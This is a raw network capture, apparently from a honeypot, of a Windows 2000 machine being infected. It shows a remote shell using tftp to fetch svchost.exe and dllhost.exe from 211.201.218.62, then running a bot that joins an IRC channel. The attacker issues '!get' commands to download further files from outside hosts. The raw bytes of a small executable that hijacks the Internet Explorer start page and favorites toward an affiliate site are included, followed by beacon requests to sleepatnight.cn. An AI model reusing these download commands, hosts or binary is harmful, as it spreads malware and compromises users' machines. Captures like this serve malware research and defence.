VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	tftp -i 211.201.218.62 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	Transfer successful: 29456 bytes in 9 seconds, 3272 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	tftp -i 211.201.218.62 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	Transfer successful: 19968 bytes in 7 seconds, 2852 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK nodooocdUSER c020500 . . :- 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	:u. PRIVMSG nodooocd :!get http:/85.114.141.207/bookmark.exe:u. PRIVMSG nodooocd :!get http:/sleepatnight.cn/oc/box.txt 
VICTIM:  	GET /bookmark.exe HTTP/1.0User-Agent: DownloadHost: 85.114.141.207Pragma: no-cache 
ATTACKER:	HTTP/1.1 200 OKDate: Mon, 02 Nov 2009 12:45:11 GMTServer: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch15Last-Modified: Sun, 01 Nov 2009 14:02:44 GMTETag: \50818a-a00-4774fb70c4900\Accept-Ranges: bytesContent-Length: 2560Connection: closeContent-Type: application/x-msdos-programMZ\220\000\003\000\000\000\004\000\000\000\377\377\000\000\270\000\000\000\000\000\000\000@\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\310\000\000\000\016\037\272\016\000\264\t\315!\270\001L\315!This program cannot be run in DOS mode.\$\000\000\000\000\000\000\000\001u\363\331E\024\235\212E\024\235\212E\024\235\212E\024\235\212V\024\235\212Ll\010\212D\024\235\212Ll\014\212D\024\235\212RichE\024\235\212\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000PE\000\000L\001\003\000\002\225\355J\000\000\000\000\000\000\000\000\340\000\003\001\013\001\t\000\000\002\000\000\000\006\000\000\000\000\000\000\000\020\000\000\000\020\000\000\000 \000\000\000\000@\000\000\020\000\000\000\002\000\000\005\000\000\000\000\000\000\000\005\000\000\000\000\000\000\000\000@\000\000\000\004\000\000\000\000\000\000\002\000\000\200\000\000\020\000\000\020\000\000\000\000\020\000\000\020\000\000\000\000\000\000\020\000\000\000\000\000\000\000\000\000\000\000< \000\000P\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000 \000\000<\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000.text\000\000\000\334\001\000\000\000\020\000\000\000\002\000\000\000\004\000\000\000\000\000\000\000\000\000\000\000\000\000\000 \000\000`.rdata\000\000\236\001\000\000\000 \000\000\000\002\000\000\000\006\000\000\000\000\000\000\000\000\000\000\000\000\000\000@\000\000@.data\000\000\000\230\002\000\000\0000\000\000\000\002\000\000\000\010\000\000\000\000\000\000\000\000\000\000\000\000\000\000@\000\000\300\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\307\005\2041@\000\200\000\000\000j\000j\000j\000j\000h\2041@\000h\0041@\000\3775\0001@\000h\003\000\000\200\350\230\001\000\000\205\300\017\205X\001\000\000h\0041@\000hG0@\000h\2101@\000\350p\001\000\000\203\304\014h\2102@\000j\001j\000h\2101@\000h\003\000\000\200\350g\001\000\000\205\300\017\205\260\000\000\000\307\005\2142@\000\000\001\000\000h\2142@\000h\2101@\000j\000j\000h\2130@\000\3775\2102@\000\350= 
ATTACKER:	\001\000\000\3775\2102@\000\350 \001\000\000h\2101@\000\350\001\000\000\213\360h\2250@\000h\2101@\000\350\363\000\000\000j\000h\200\000\000\000j\002j\000j\001h\000\000\000@h\2101@\000\350\305\000\000\000\205\300tB\213\330h\2540@\000\350\315\000\000\000j\000h\2242@\000Ph\2540@\000S\350\256\000\000\000h\0000@\000\350\260\000\000\000j\000h\2242@\000Ph\0000@\000S\350\221\000\000\000S\350y\000\000\000h\0041@\000h\3050@\000h\2101@\000\350\211\000\000\000\203\304\014h\2102@\000h\006\000\002\000j\000h\2101@\000h\003\000\000\200\350}\000\000\000\205\300u0h\0000@\000\350W\000\000\000@Ph\0000@\000j\001j\000h\3620@\000\3775\2102@\000\350`\000\000\000\3775\2102@\000\350=\000\000\000\377\005\0001@\000\351t\376\377\377j\000\350\000\000\000\314\377%\030 @\000\377%( @\000\377%\$ @\000\377%  @\000\377%\034 @\000\377%, @\000\377%4 @\000\377%\010 @\000\377%\004 @\000\377%\000 @\000\377%\020 @\000\377%\014 @\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000Z!\000\000J!\000\000<!\000\000~!\000\000j!\000\000\000\000\000\000\310 \000\000\376 \000\000\362 \000\000\344 \000\000\326 \000\000!\000\000\000\000\000\000\$!\000\000\000\000\000\000\244 \000\000\000\000\000\000\000\000\000\000\026!\000\000\030 \000\000\300 \000\000\000\000\000\000\000\000\000\0000!\000\0004 \000\000\214 \000\000\000\000\000\000\000\000\000\000\220!\000\000\000 \000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000Z!\000\000J!\000\000<!\000\000~!\000\000j!\000\000\000\000\000\000\310 \000\000\376 \000\000\362 \000\000\344 \000\000\326 \000\000!\000\000\000\000\000\000\$!\000\000\000\000\000\000\031\000CloseHandle\0002\000CreateFileA\000u\000ExitProcess\000\271\002WriteFile\000\323\002lstrcatA\000\000\342\002lstrlenA\000\000KERNEL32.dll\000\000\245\002wsprintfA\000USER32.dll\000\000E\001RegCloseKey\000Q\001RegEnumKeyExA\000\\\001RegOpenKeyExA\000e\001RegQueryValueExA\000\000p\001RegSetValueExA\000\000ADVAPI32.dll\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000http:/join.clonecashsystem.com/track/NjU1ODMuMjYuMzEuMzUuMC4wLjAuMC4w\000%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\000Favorites\000\\Clone Cash System.url\000[InternetShortcut]URL=\000%s\\Software\\Microsoft\\Internet Explorer\\Main\000Start Page\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000 
ATTACKER:	GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost: sleepatnight.cnPragma: no-cache 
ATTACKER:	GET /op/lgate.php?n=6D05DF620DE704D8 HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: sleepatnight.cnConnection: Keep-Alive 
ATTACKER:	GET /lib/ssv.txt HTTP/1.0Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: sleepatnight.cnConnection: Keep-Alive 
ATTACKER:	PING :i. 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu